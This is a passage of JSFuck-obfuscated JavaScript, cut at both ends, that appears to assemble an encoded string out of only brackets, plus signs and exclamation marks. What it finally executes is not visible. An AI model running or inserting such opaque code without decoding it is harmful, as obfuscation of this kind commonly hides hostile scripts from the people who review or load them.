]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[+[]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+